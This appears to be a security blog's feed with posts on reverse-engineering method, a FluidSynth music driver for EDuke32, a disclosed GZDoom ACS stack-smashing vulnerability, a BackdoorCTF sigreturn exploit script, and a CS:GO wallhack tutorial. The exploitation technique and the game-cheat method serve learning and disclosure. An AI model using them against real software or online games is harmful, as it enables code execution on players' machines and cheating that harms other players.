usage alone that all a subroutine does is print something, it probably isn't worth your time to disassemble it. 
Remember, you can always come back to something later, but if you waste your time on it, those are valuable competition minutes that you'll never get back.</p> <p class="indent">Finally, this is more general, and it's something that I think every reverse engineer knows, but it's worth mentioning regardless. If you don't know the ISA, the architecture's calling conventions, or the quirks of the language design and the compiler, it might be in your best interest to create a "lexicon" of high-level constructs and how they're represented in assembly. There's absolutely no shame in doing this, and it's been especially helpful for me when I've looked at any binaries that were compiled with MSVC. One tool that I've found useful for creating these lexicons is the <a href="https://godbolt.org/">Godbolt Compiler Explorer</a>.</p> <p class="indent">Hopefully that wasn't too long of an introduction. Now we can get into the protocol itself. It's composed of five steps that make up a mnemonic: "SCARS." The first step is to "skim," or "scan." The premise is to first get an idea of which memory addresses the subroutine spans, or how long it is. I usually look for the typical "function epilogue," which might include a stack canary check, or it might just be a "pop %rbp; ret." Then, get context. See where the subroutine is called and how it's called - figure out if there are any arguments to the subroutine, and see if it returns anything. Finally, look over the disassembly listing for the routine, paying attention to the use of stack variables and global variables. Do any of those variables look like they might be classes/structures?</p> <p class="indent">The second step is to "chunk." The first step should have given you a rough idea of the control flow, but now you need to break the subroutine into smaller sets of instructions that you can analyze. 
I usually separate based on whether or not a set of instructions is skipped by a conditional jump.</p> <p class="indent">The third step is "arrange." Simply put, this involves taking your findings about stack variables and such from the first step, and converting them to declarations in the high-level language. I also like to make stubs for any other subroutines that are called, since I'll probably be reversing those later anyway. This third step also ties in with the fourth step, which is to "recognize." This involves looking back on your lexicon of patterns, and converting them to the high-level constructs that they represent. These two steps are done simultaneously and are basically where you try to manually decompile the chunks of machine code you plotted out in the previous step.</p> <p class="indent">The final step is to "simplify," which entails simplifying the resultant code into something perhaps more understandable. For example, 1 &lt;&lt; 4 is equivalent to 1 * 2^4, or just 16. This also might be where you replace magic numbers with constants. Whenever I see 0 passed to read(3), I replace that with "STDIN_FILENO".</p> <p class="indent">I spent a little under twenty minutes last night reversing the binary from the challenge I mentioned at the beginning of this post. That's not a lot of time compared to how much I spent during the competition, and I got surprisingly far (almost all of main!). If this were the competition, however, I would have done it differently. Instead of starting at main, I would have probably started at one of the functions for handling input and worked backwards by checking for XREFs. I only did it this way to test out the protocol for something I had difficulty with in the past. Here are a few of the highlights. 
If you want to look on with me, all of the files for the challenge can be found <a href="https://github.com/DhavalKapil/ctf-writeups/tree/master/insomni-hack-18/sapeloshop">here</a>.</p> <p class="indent">The most useful part about rewriting the program in C is the malleability of text. When I was passively reading disassembly listings, keeping track of how values were being juggled across registers was difficult for me. But by representing these instructions in C, I can convert a few of them into an expression, comment which register they're in, and come back to use that expression later. This is more useful when the juggling spans a large number of instructions, but here's a smaller example where I still used it. The disassembly at 0x1e15 is</p> <pre><code>0x00001e15      488d8550b7ff.  leaq -0x48b0(%rbp), %rax
0x00001e1c      488d90080400.  leaq 0x408(%rax), %rdx
0x00001e23      488b8540b7ff.  movq -0x48c0(%rbp), %rax
0x00001e2a      488d35bf0800.  leaq str.User_Agent:__128, %rsi ; 0x26f0 ; "User-Agent: %128[^\r\n]\r\n"
0x00001e31      4889c7         movq %rax, %rdi
0x00001e34      b800000000     movl $0, %eax
</code></pre> <p class="indent">I had previously made a variable for <code>-0x48b0(%rbp)</code> during my "arrange" step, temporarily named "local_48b0" until I figured out its usage and a better name for it. Just from these six instructions, I can tell that it's a buffer of some sort, so I started off with:</p> <pre><code class="lang-c">((void *) local_48b0); // rax
</code></pre> <p>Then, I handled the pointer arithmetic in the second instruction, and the third instruction, since it replaced the value in %rax:</p> <pre><code>(void *) (((char *) (local_48b0)) + 0x408); // rdx
*((uint64_t *) &amp;local_48c0); // rax
</code></pre> <p class="indent">Ew. It's starting to look like some system programmer's personal Lisp dialect now. Don't worry. It's gross now, but as you understand more of the subroutine, you'll be able to declare variables in such a way that you won't need casts like these. 
That's where the "simplify" step comes into play.</p> <p class="indent">Also, I should mention that you don't necessarily have to reverse the chunks you came up with in a linear fashion. I saw a chunk with two calls to some <code>__errno_location</code>, which I didn't want to deal with at the time, so I just went on to the next chunk. Again, you can come back to stuff later, but this does mean you need to keep track of which chunks you've covered.</p> <p class="indent">One thing I've done in the past with this protocol is to keep a little ASCII drawing of the stack layout. It doesn't make a whole lot of sense here, since there aren't any pushes or pops that would change the size of the stack frame, but maybe you'll find it useful for 32-bit binaries.</p> <p class="indent">Oh, and one last thing. Not everything is worth adding into your decompilation. For example, if I saw a timer being set up with alarm(3), I would probably ignore it. In fact, I'd patch it out, but that's a topic for another day.</p> <p>Any questions about things I mentioned in this post, or suggestions on how to make it better? Both would be greatly appreciated. Contact info is on my <a href="http://jakob.space">homepage</a>.</p> Duke on FluidSynth http://jakob.spaceDuke+on+FluidSynth http://jakob.spaceDuke+on+FluidSynth Sat, 13 Jan 2018 21:10:03 EST <p class="indent">My first experiences with Duke Nukem 3D were with EDuke32 ages ago. This was back when I was running Windows Vista, and while my memory is a bit lacking, I swear that I had working music then. Ever since I made the switch to Linux, I haven't had working music playback in EDuke. 
Frustrated that my past few years of Duke 3D have been devoid of all sound besides the screams of death and Duke's trash talking, I've finally decided to troubleshoot it.</p> <p class="indent">My first hypothesis was that there was a build flag for music support, and that the binaries for EDuke in my distribution's package repository were compiled without it. This led me to look at the <a href="http://wiki.eduke32.com/wiki/Building_EDuke32_on_Linux">Linux build instructions</a>, which specifically mention an "EDUKE32_MUSIC_CMD" environment variable for specifying an external MIDI player to use. This tipped me off to the issue: my version of EDuke couldn't play MIDI. This made sense, since all of the other game sounds were working just fine. I set the TiMidity++ command-line tool as the external MIDI player, as I've had luck using TiMidity++ with Qzdoom, and it worked on the first try. This victory was short-lived, however, as the game froze the second I started up the first episode. I figured that EDuke was waiting on the TiMidity++ process to die off, which is when I decided to crack open the source code.</p> <p class="indent">The code revealed that on Linux platforms, EDuke uses SDL2_Mixer for music output. I'm mildly familiar with it; it's a wrapper around the SDL audio module, providing loaders for several sound formats such as OGG and MIDI. Unfortunately, it seems incapable of playing MIDI on my system. Some further research revealed that for MIDI playback, SDL2_Mixer can use either FluidSynth or an internal version of TiMidity. This reminded me of an issue I had when I first installed Gzdoom on my machine: soundfonts.</p> <p class="indent">You're supposed to be able to specify a default soundfont for FluidSynth in /etc/conf.d/fluidsynth, but in my experience with the command-line tool, this is ignored entirely. 
Similarly, a default soundfont can be specified in /etc/timidity++/timidity.cfg, but the only things I've used that have respected that are Qzdoom and the TiMidity++ command-line tool. Compiling SDL2_Mixer from source and forcing it to use the internal version of TiMidity has the same issue as before.</p> <p class="indent">I suspect that the reason for this is the fragmentation of TiMidity releases. SDL2_Mixer has an internal version of TiMidity. So does Qzdoom. It seems to be one of those libraries that just gets copied into version control because it's small enough, like that Vorbis decoder by RAD Game Tools. This has the consequence that it will almost never be updated, and you may have several programs using different, incompatible versions of it. In the case of Qzdoom, the copyright header in timidity.cpp is dated 1995.</p> <p class="indent">I looked at <a href="http://libtimidity.sourceforge.net/">libTiMidity</a> in hopes of debugging the issue, which is when I realized that some versions of TiMidity literally do not support specifying a default soundfont, which would explain why SDL2_Mixer is dead silent.</p> <p><img src="/img/fluidsynth_1.png" alt="This is a pretty overdue feature, guys."></p> <p class="indent">Alright, so TiMidity isn't the way to go at all, and FluidSynth has issues specifying a default soundfont via configuration files, but perhaps the FluidSynth <em>API</em> exposes a means of specifying a soundfont. Fortunately, this was easy to check, as FluidSynth has the best documentation I've ever seen from a library written in C. The developer documentation is rich with examples, and one of them even involves what we're looking for. Loading a soundfont with FluidSynth turns out to be as easy as calling "fluid_synth_sfload".</p> <p class="indent">Writing a drop-in replacement for the SDL2_Mixer MIDI driver is uncomplicated because Duke3D maintains a structured API for its music drivers. 
There are two drivers in the source tree, currently: the original Apogee Sound System implementation (source/duke3d/src/music.cpp), and the reimplementation using SDL2_Mixer (source/duke3d/src/sdlmusic.cpp). To make things simple, we'll just replace sdlmusic.cpp and define the following routines:</p> <ul> <li>const char *MUSIC_ErrorString(int32_t ErrorNumber)</li> <li>int32_t MUSIC_Init(int32_t SoundCard, int32_t Address)</li> <li>int32_t MUSIC_Shutdown(void)</li> <li>void MUSIC_SetVolume(int32_t volume)</li> <li>int32_t MUSIC_GetVolume(void)</li> <li>void MUSIC_SetLoopFlag(int32_t loopflag)</li> <li>void MUSIC_Continue(void)</li> <li>void MUSIC_Pause(void)</li> <li>int32_t MUSIC_StopSong(void)</li> <li>int32_t MUSIC_PlaySong(char *song, int32_t loopflag)</li> <li>int32_t MUSIC_InitMidi(int32_t card, midifuncs *Funcs, int32_t Address)</li> <li>void MUSIC_Update(void)</li> </ul> <p class="indent">The names are very descriptive in this case, and the routines themselves are quite simple. Routines that return an int32_t are just returning an error code (MUSIC_Ok or MUSIC_Error), with the exception of MUSIC_GetVolume, which returns the volume on a scale of 0 to 255. In our case, most of these will be stubs. For example, MUSIC_Update and MUSIC_Continue are irrelevant for FluidSynth.</p> <p class="indent">Also, it's worth mentioning that the "song" parameter to MUSIC_PlaySong isn't a filename, it's a pointer to an in-memory version of the MIDI file. FluidSynth supports reading MIDI files from memory, but unlike SDL2_Mixer's in-memory MIDI loader, the file's size has to be explicitly specified. I dug up a <a href="https://github.com/colxi/midi-parser-js/wiki/MIDI-File-Format-Specifications">specification of the format</a> and hacked together a little routine to figure out the size. 
It isn't particularly important, but I wanted to mention it because it worked on the first try, which warranted some celebration.</p> <pre><code class="lang-c">char *tracks;
size_t file_size;
uint16_t num_tracks;

/* MIDI files are big-endian. The track count is the 16-bit word at
   offset 0x0a of the &quot;MThd&quot; chunk, which is 0x0e bytes long in total. */
num_tracks = ((uint8_t) song[0x0a] &lt;&lt; 8) | (uint8_t) song[0x0b];
tracks = song + 0x0e;
file_size = 0x0e; // Size of the MIDI header.

while (num_tracks--) {
    uint32_t track_size;

    if (memcmp(tracks, &quot;MTrk&quot;, 4)) {
        break; // Not a track chunk; the file is truncated or malformed.
    }

    /* 32-bit big-endian chunk length at offset 0x04, which doesn't count
       the 8-byte &quot;MTrk&quot; header itself. */
    track_size = ((uint32_t) (uint8_t) tracks[0x04] &lt;&lt; 24)
               | ((uint32_t) (uint8_t) tracks[0x05] &lt;&lt; 16)
               | ((uint32_t) (uint8_t) tracks[0x06] &lt;&lt; 8)
               |  (uint32_t) (uint8_t) tracks[0x07];
    file_size += track_size + 0x08;
    tracks += track_size + 0x08;
}
</code></pre> <p class="indent">This all ended up being simple enough that I was able to get MIDI playback working in under an hour on a Friday night. Yeah. I had some friends who wanted to go out that night, but I stayed home and wrote a MIDI driver instead. (That isn't the real reason, I'm not that much of a loser).</p> <p>Unfortunately, because I was just hacking it together quickly, the initial implementation had a few issues:</p> <ul> <li>No error reporting (MUSIC_ErrorString just returns "Nothing to see here...")</li> <li>Doesn't use modern C++, and only loosely follows the EDuke32 code style.</li> <li>Directly includes the FluidSynth headers, which seems to be a taboo in the EDuke codebase.</li> <li>MUSIC_StopSong will shut down and reinitialize the entire audio driver just to flush whatever's currently playing out of the player.</li> <li>Replaces sdlmusic.cpp, instead of being an independent source file that can be included at compile time.</li> <li>No volume controls.</li> <li>Soundfont and audio backend are hardcoded to my system.</li> </ul> <p class="indent">The first three were quite easy to fix, and as I don't have any plans to push this upstream, they were really non-issues. The thing with MUSIC_StopSong is also kind of a non-issue, as reinitializing the audio system is the only way to flush the FluidSynth player right now. 
That fifth issue is also something I'm not going to deal with unless someone confronts me about getting this included upstream, because this is a lot easier to maintain as a drop-in replacement.</p> <p class="indent">Volume controls were extremely trivial to implement, as the only thing the driver has to do is expose MUSIC_SetVolume. The routine receives a number on the interval [0, 255], where 0 is the quietest, and 255 is the loudest. FluidSynth provides a "synth.gain" setting, which is essentially volume, but it instead accepts numbers on the interval [0.0, 10.0].</p> <p class="indent">The naïve approach (which is what I did the first time around) is to multiply the parameter by some scalar (10.0 / 255) to fit on the interval of [0.0, 10.0]. This was quite painful for my poor little ears. So I instead scaled the number to fit on the interval of [0.0, 1.0].</p> <p class="indent">Finally, specifying the soundfont is something I'll address in the future. My patch adds some stuff to the EDuke options menu for specifying an audio backend (alsa, pulse, etc), but I have yet to figure out how to make an option that's stored as a string.</p> <p class="indent">If you want to check out my patchset, you can view the repository <a href="https://github.com/TsarFox/duke-on-fluidsynth">here</a>, and there's a demo video <a href="https://www.youtube.com/watch?v=mxkctwRZlHo">here</a>.</p> Bad BEHAVIOR http://jakob.spaceBad+BEHAVIOR http://jakob.spaceBad+BEHAVIOR Thu, 4 Jan 2018 15:45:14 EST <p class="indent">TL;DR, I discovered a stack-smashing vulnerability in GZDoom's interpreter for ACS. As a preface, there's a tendency for whitepapers like this in the security community to be written with a somewhat condescending tone towards the product's vendor. I do not mean for any portion of this writeup to come off as degrading to the developers involved. Yes, the bug was obvious to <em>me</em>, but it was still subtle enough that it went under the radar for nearly 23 years. 
Most developers aren't actively thinking about this kind of attack while writing a bytecode interpreter. I have an enormous amount of respect for the development teams of both GZDoom and Zandronum, who were quick to issue a patch addressing the issue and were respectful of my wishes to release this whitepaper to the public. I'd also like to thank everyone I had the pleasure of working with during this process; it warms my heart to know that the communities behind these open-source software projects are this friendly.</p> <p class="indent">Documentation and exploit code are available <a href="https://github.com/tsarfox/bad-behavior">here</a>, which is where I would like to direct any source port maintainers. There is a good chance that your port is vulnerable, and the patch to fix it is not overly-complicated.</p> <hr> <p class="indent">It's been a little over a year and a half since my first capture-the-flag competition. In that time, I've exploited countless binaries, all simulated. Popping a shell had no impact, no consequences within the real world. Recently, though, I've experienced somewhat of a wake up call. The day has finally come that I've discovered a security-critical bug in the wild to call my own.</p> <p class="indent">The research was impromptu, motivated by a few things I noticed while working away on a map for Doom. If you want to script events in Doom, such as a boss spawning and text appearing on the screen when the player flips a switch, you use a somewhat obscure DSL called <a href="https://zdoom.org/wiki/ACS">ACS</a>. The language was designed in the 90's for Hexen, a game intended to run on MS-DOS, so the implementation is full of design decisions that seem archaic nowadays. 
For one, scripts are compiled ahead of time into a bytecode object, which is then stored in a map's BEHAVIOR <a href="https://zdoom.org/wiki/Lumps">lump</a>, and finally run on a stack machine that has access to the game's state.</p> <p class="indent">ACS bytecode isn't completely unfamiliar to me; I wrote a disassembler for it a while ago in an attempt to learn more about radare2's internals. Despite this, the idea that the interpreter for it might allow some foul play to go by didn't cross my mind until I was actually working with ACS on the source code level. The language is, to say the least, hacked together. The type system is extremely weak, and on a low level, the only type it understands is int. There's support for strings, but they're an index into a table in the bytecode object, which can lead to some interesting behavior. Take this valid ACS code, for example:</p> <pre><code>script 1 ENTER
{
    print(s:"You picked the wrong house, foo'!");

    // Also displays "You picked the wrong house, foo'!"
    print(s:0);
}
</code></pre> <p>String constants are cast to the index at which they are located in the string table, which means you can do math with strings - albeit a little less intuitively than string math in JavaScript.</p> <pre><code>script 1 ENTER
{
    // Displays "1" (Since that's 0 + 1)
    print(d:"First String" + "Second String");
}
</code></pre> <p class="indent">There are a handful of other quirks, such as the fact that arguments can be omitted when you invoke a function. The fragile nature of ACS made me want to look at GZDoom's implementation to see if it would reject any code that does things it shouldn't. What I initially had in mind was pulling something out of the string table that doesn't exist, but when I cracked open the source code to look at PCD_PRINTSTRING, I noticed something a little more sinister.</p> <pre><code>case PCD_PRINTNUMBER:
    work.AppendFormat ("%d", STACK(1));
    --sp;
    break;
</code></pre> <p class="indent">Hm? 
It looks like the stack pointer is decremented without any bounds checking. This is C++, though, and it's entirely possible that this is operator overloading, so I looked at how the interpreter's stack was implemented.</p> <pre><code>FACSStack stackobj;
int32_t *Stack = stackobj.buffer;
int &amp;sp = stackobj.sp;
</code></pre> <p class="indent">No, it isn't operator overloading. This is bad. As an adversary who can manipulate the bytecode in a BEHAVIOR lump, we have complete control over an index into a buffer. Let's take a peek at FACSStack.</p> <pre><code>struct FACSStack
{
    int32_t buffer[STACK_SIZE]; // STACK_SIZE is 0x1000
    int sp;

    FACSStack *next;
    FACSStack *prev;

    static FACSStack *head;

    FACSStack();
    ~FACSStack();
};
</code></pre> <p>Take note that the stack pointer is adjacent to the buffer. That will be important in the exploit.</p> <p class="indent">Let's start with a few experiments. The first thing I did was add some debug prints to certain points in the ACS interpreter so that I could see where the stack pointer is within the program's memory map. Now we can get our hands dirty with ACS bytecode. At the time I was performing this research, I didn't know how everything in the BEHAVIOR lump contributed to the final image, so I spent about a half hour figuring out how to create a valid bytecode object by looking at different BEHAVIOR lumps in a hex editor. What I <em>should</em> have done was slowed down and looked at FBehavior::Init in p_acs.cpp, but whatever, my way worked with some trial and error. If you want to play with hand-writing ACS bytecode on your own, you can use my exploit code as a base. Just alter the "payload" array to contain the bytes you want to have run.</p> <p class="indent">Now, this is where the post is going to get a little confusing, since I have to talk about two entirely different stacks. 
For the remainder of this whitepaper, I'll refer to the ACS interpreter's stack as "VStack," and the GZDoom process's stack as "SStack."</p> <p class="indent">Initially, I showed off the implementation of PCD_PRINTNUMBER, but something that decrements the VStack pointer isn't desirable. Let me explain - the SStack grows downwards on x86; that is, the SStack pointer starts at a very high address and decreases as you push things onto the SStack. The VStack works in the opposite direction: as you push things onto the VStack, the VStack pointer increases. We want to traverse the SStack to the return address, which was pushed before our script began execution, so we want an opcode that increments the VStack pointer instead of one that decrements it. Fortunately, this isn't difficult to find.</p> <pre><code>case PCD_PUSHBYTE:
    PushToStack (*(uint8_t *)pc);
    pc = (int *)((uint8_t *)pc + 1);
    break;
</code></pre> <p>Where PushToStack is a macro defined as:</p> <pre><code>#define PushToStack(a) (Stack[sp++] = (a))
</code></pre> <p class="indent">So the exploit <em>will</em> overwrite the locals in the interpreter's stack frame, but there's only really one variable we have to worry about borking, which I'll talk about in a little bit. Let's jump in and craft a BEHAVIOR lump which calls PUSHBYTE a bunch of times.</p> <p><img src="/img/bad_behavior_1.png" alt="Foiled!"></p> <p class="indent">We seem to end prematurely, which is because we hit the stack pointer. We will have to modify our exploit to step over it somehow, which we can do by overwriting the stack pointer with a value that points beyond it. Notice, however, that PUSHBYTE increments the stack pointer by a whole four bytes. When we push a byte, we're actually pushing a 4-byte integer with the high bytes all set to 0, so we can't overwrite the stack pointer one "byte" at a time. 
Fortunately, there is another ACS opcode, PCD_PUSHNUMBER, which pushes a full 4-byte integer.</p> <p class="indent">With some fiddling in GDB, we can find that the distance between the stack buffer and the return address is 4122 bytes. So we actually kill two birds with one stone by smashing the stack pointer - the offset to the return address is small enough that the desired stack pointer value fits into a 4-byte word. As soon as we overwrite the stack pointer, we're at the return address. I suppose maybe we killed three birds with one stone here, since we jumped over the stack canary, too. Now we're at the fun part and can overwrite the return pointer with another call or two to PCD_PUSHNUMBER. My exploit code writes 0xdeadbeefcafebabe, because it's recognizable in a stacktrace, but theoretically you could overwrite the least significant bytes of the return address and jump somewhere in GZDoom's .text segment, bypassing ASLR.</p> <p><img src="/img/bad_behavior_2.png" alt="IP Control"></p> <p class="indent">We have complete control over the instruction pointer. Also, while I was disclosing this to the development team, we discovered that vanilla Hexen has this same arbitrary code execution vulnerability. No proof-of-concept yet.</p> <p><img src="/img/bad_behavior_3.png" alt="Vanilla Hexen Vulnerable"></p> BackdoorCTF 2017: FUNSIGNALS http://jakob.spaceBackdoorCTF+2017%3A+FUNSIGNALS http://jakob.spaceBackdoorCTF+2017%3A+FUNSIGNALS Sat, 24 Sep 2017 12:01:42 EST <p>"funsignals" was a 250-point binary exploitation challenge with 58 solves. The challenge itself was a very trivial example of sigreturn-oriented programming.</p> <p class="indent">Sigreturn-oriented programming is a means of getting values into certain registers without having to use ROP gadgets that pop values from the stack. 
It's a technique that relies on how UNIX-like operating systems implement signals - to quote an <a href="https://lwn.net/Articles/676803/">article from LWN on the subject</a>, "when a signal is delivered to a process, execution jumps to the designated signal handler; when the handler is done, control returns to the location where execution was interrupted. Signals are a form of software interrupt, and all of the usual interrupt-like accounting must be dealt with. In particular, before the kernel can deliver a signal, it must make a note of the current execution context, including the values stored in all of the processor registers."</p> <p class="indent">That "execution context" is quite simply a structure stored on the stack, which is colloquially known as the "sigcontext" structure and is defined in the architecture-specific headers of the Linux kernel. x86, for example is found at <a href="http://elixir.free-electrons.com/linux/latest/source/arch/x86/include/uapi/asm/sigcontext.h">arch/x86/include/uapi/asm/sigcontext.h</a>.</p> <p>We're given a small amd64 Linux binary for the challenge. Its code is only a few bytes long:</p> <pre><code>;-- _start: 0x10000000 31c0 xorl %eax, %eax 0x10000002 31ff xorl %edi, %edi 0x10000004 31d2 xorl %edx, %edx 0x10000006 b604 movb $4, %dh 0x10000008 4889e6 movq %rsp, %rsi 0x1000000b 0f05 syscall 0x1000000d 31ff xorl %edi, %edi 0x1000000f 6a0f pushq $0xf 0x10000011 58 popq %rax 0x10000012 0f05 syscall 0x10000014 cc int3 ;-- syscall: 0x10000015 0f05 syscall 0x10000017 4831ff xorq %rdi, %rdi 0x1000001a 48c7c03c0000. 
movq $0x3c, %rax 0x10000021 0f05 syscall </code></pre> <p>Don't be intimidated by the seemingly uncommon syscall instruction; the portion before the "syscall" symbol is equivalent to the following C code.</p> <pre><code>char buf[0x400]; read(0, buf, 0x400); sigreturn(); </code></pre> <p class="indent">sigreturn(2) is a system call you never call directly in practice, but as we mentioned earlier, the process needs to restore the context when it returns from a signal handler. This is how it's done. sigreturn(2) essentially pops the sigcontext structure from the stack and fills the proper registers. Also, that int3 instruction should be a hint to us that we'll have to manipulate the instruction pointer, too, since the program would abort if we hit it.</p> <p class="indent">A few bytes following the binary's code is a string that sticks out like a sore thumb: "fake_flag_here_as_original_is_at_server". To get the flag, we're going to want to print out whatever's at that address, which we can do with the sys_write system call. We want to load 0x01, the syscall number for sys_write, into %rax; 0x01 into %rdi for stdout; 0x10000023 into %rsi, the address of the flag we want to print; and 0x29 into %rdx, the approximate length of the flag. Once the registers are all set up, we need to invoke the kernel, so we'll set %rip to 0x10000015 - where there's a syscall instruction followed by a clean exit. To load all of those registers, we will fill out a sigcontext frame containing the values.</p> <p class="indent">Now, I would highly advise against manually packing the sigcontext structure, as there are a few undocumented fields that can and will cause segmentation faults coming from seemingly nowhere.
<a href="https://docs.pwntools.com/en/stable/">pwntools</a> provides the pwnlib.rop.srop package for creating sigcontext frames, and the API is simple enough to understand just from the exploit code.</p> <pre><code>#!/usr/bin/env python from pwn import * SIGCONTEXT = SigreturnFrame(arch="amd64") SIGCONTEXT.rax = 0x01 SIGCONTEXT.rdi = 0x01 SIGCONTEXT.rsi = 0x10000023 SIGCONTEXT.rdx = 0x29 SIGCONTEXT.rip = 0x10000015 proc = remote("", 9034) proc.sendline(bytes(SIGCONTEXT)) print(proc.recv()) </code></pre> <pre><code>[jakob@Epsilon funsignals]$ ./exploit.py [+] Opening connection to on port 9034: Done b'flag{W3lc0m3_T0_th3_n3w_w0rld_OF_S1gn4l5}' [*] Closed connection to port 9034 </code></pre> <p class="indent">As an aside, you typically won't have an explicit call to sigreturn(2) in the binary. Sigreturn-oriented programming is most commonly combined with ROP, where a gadget to load 0xf into %rax and a gadget to perform a syscall are used.</p> Understand Game Hacking in One Post http://jakob.spaceUnderstand+Game+Hacking+in+One+Post http://jakob.spaceUnderstand+Game+Hacking+in+One+Post Tue, 5 Sep 2017 15:06:36 EST <p class="indent">At first glance, it might seem that game cheats like <a href="https://github.com/AimTuxOfficial/AimTux">AimTux</a> are something that could only be conjured by the most talented of reverse engineers. That was at least my initial view on it, especially since I always saw these game hackers using outlandish terms that I hadn't heard in over a year of playing in CTFs. Don't be fooled; game hacking isn't nearly as complex as its community makes it seem. In this post, I will explain the concepts in a way that is familiar to people with experience in binary exploitation and reverse engineering, but it shouldn't be too hard to understand if you lack that background.</p> <p class="indent">You want to know the secret of game hacking? Editing memory. Much can be accomplished with nothing more than a few writes to process memory.
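</p> <p class="indent">To make "editing memory" concrete, here's what those two primitives look like on Linux through procfs. This is my own sketch, not code from any of the cheats mentioned here - the helper names are made up, and you need the same privileges over the target process that ptrace would require (in practice, root).</p>

```python
def read_mem(pid, addr, size):
    """Read `size` bytes at `addr` from the process `pid`."""
    with open("/proc/%d/mem" % pid, "rb") as mem:
        mem.seek(addr)
        return mem.read(size)

def write_mem(pid, addr, data):
    """Write `data` at `addr` in the process `pid`.

    "r+b" opens for writing without O_TRUNC, which is what we
    want for a procfs mem file."""
    with open("/proc/%d/mem" % pid, "r+b") as mem:
        mem.seek(addr)
        return mem.write(data)
```

<p class="indent">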
This should be unsurprising if you've used Cheat Engine, scanmem, or even the Game Genie. Memory editing, despite the fact that much is nowadays validated on the server, remains king in the cheat market. Reading and writing memory are your primitives, and I'll show you just how effective they can be by walking you through a basic wallhack for CS:GO. I chose Counter-Strike as an example because there is a wealth of information out there, and it has an active community constantly hacking on it. In case you want to go forth and do more on your own, y'know?</p> <p class="indent">First, I should explain the two methods of editing process memory. Developers of game hacks refer to the methods as "internal" and "external", where internal means a dynamic library that gets injected into the game's address space, and external means a separate process that manipulates memory by means of the operating system. <a href="https://github.com/AimTuxOfficial/AimTux">AimTux</a> is an example of an internal hack, and <a href="https://gitgud.io/vc/vcaim">vcaim</a> is an example of an external hack. We'll be writing an external cheat in this blog post. If you want to learn more about writing internal cheats on Linux, though, <a href="https://aixxe.net/2016/09/linux-skin-changer">this blog post by Aixxe</a> is excellent.</p> <p class="indent">Next, there's some terminology that people use when talking about memory-manipulating cheats: "offsets" and "signatures." If you've ever performed a ret2libc attack on a system with ASLR, you already know about offsets. It's just a number you add to the address at which a library was loaded to get the position of something in memory. In the case of ret2libc, you're trying to get to a function like system(3), but in the case of CS:GO hacks, you're trying to get to something like a list of entities currently in the game.
You can try to find functions, too, which we'll be doing in this post to write wallhacks, but most legit CS:GO hacks go after entity data.</p> <p class="indent">Games get updated and therefore recompiled quite often, so offsets are constantly changing. To combat this, cheat developers devised ways to scan for "signatures" in memory. That is, patterns of bytes that will reveal the offset - either by being around the desired offset, or by being code that references it. If you get signatures from someone, they will probably look like "B9 ? ? ? ? 6A 00 FF 50 08 C3". Those are hexpairs, and the question marks are bytes that get ignored because they're an address or something else that will likely change in a future update.</p> <p class="indent">Oh yeah, I probably should've mentioned why we're using offsets instead of fixed addresses. It <em>is</em> because of ASLR - a lot of CS:GO's code is stored in shared libraries. Specifically, client_client.so and engine_client.so. Where these are depends on whether you're using an amd64 or an x86 processor. Just use find(1) in the Steam directory, man.</p> <p class="indent">As a heads up, this cheat is mostly a <a href="https://aixxe.net/2017/06/kernel-game-hacking">paste I stole from Emma</a>. I didn't come up with it myself, but I thought that it was simple enough to be an example for this post.</p> <p class="indent">The way we're going to go about writing our wallhack is pretty primitive: patching the .text segment. We're going to do this by editing memory, though, not the binary on disk. In CS:GO, there's a "glow" effect that spectators have - allowing them to see the outlines of other players in gamemodes like Casual. If we can find the offset to the code that checks whether we're a spectator and patch it, we can enable the glowing effect and see through walls.</p> <p class="indent">The glow effect is also controlled by a "cvar," which is just a client-side configuration variable. Specifically, it checks "spec_show_xray".
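</p> <p class="indent">The signature scanning described above is simple enough to sketch in a few lines of Python. This isn't code from any particular cheat - the function names are mine - but it shows the idea: parse the hexpairs, treat "?" as a wildcard, and slide the pattern over a memory dump.</p>

```python
def parse_signature(sig):
    """Turn "B9 ? ? ? ? 6A 00" into a list of ints, None for wildcards."""
    return [None if b == "?" else int(b, 16) for b in sig.split()]

def find_signature(data, sig):
    """Return the offset of the first match of `sig` in `data`, or -1."""
    pattern = parse_signature(sig)
    for i in range(len(data) - len(pattern) + 1):
        # A position matches if every non-wildcard byte agrees.
        if all(p is None or data[i + j] == p for j, p in enumerate(pattern)):
            return i
    return -1
```

<p class="indent">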
If we open up client_client.so in radare2, we can see that that's a plain ASCII string and that there are two references to it in the .text segment.</p> <pre><code>[0x005eef60]&gt; iz~spec_show_xray vaddr=0x0135c245 paddr=0x0135c245 ordinal=3016 sz=15 len=14 section=.rodata type=ascii string=spec_show_xray [0x005eef60]&gt; iS [Sections] ... idx=11 vaddr=0x005eef60 paddr=0x005eef60 sz=13998500 vsz=13998500 perm=--r-x name=.text ... 40 sections [0x005eef60]&gt; e search.from=0x005eef60 [0x005eef60]&gt; e search.to=0x005eef60+13998500 [0x005eef60]&gt; /r 0x0135c245 [0x01348878-0x01348904] data 0x6236aa leaq str.spec_show_xray, %rsi in unknown function data 0x71817c leaq str.spec_show_xray, %rsi in unknown function </code></pre> <p>If we seek to the first one, we'll see a disassembly listing like this:</p> <pre><code>0x00623690 4c8d0de9c664. leaq 0x00c6fd80, %r9 0x00623697 b980000800 movl $0x80080, %ecx 0x0062369c 4c8d05c5fdd9. leaq 0x013c3468, %r8 ; "If set to 1, you can see player outlines and name IDs through walls - who you can see depends on your team and mode" 0x006236a3 488d159af1d3. leaq 0x01362844, %rdx ; "0" 0x006236aa 488d35948bd3. leaq 0x0135c245, %rsi ; "spec_show_xray" 0x006236b1 488d3d080df6. leaq 0x065843c0, %rdi 0x006236b8 e8c3278e00 callq 0xf05e80 </code></pre> <p class="indent">This is how cvars are "constructed" in the Source engine. %rdi contains the address of the actual variable, which is at 0x065843c0. This is done so that the variable can be changed from the in-game console, if the player so desires. But what this means for us is that we can easily find the address of a cvar in memory.
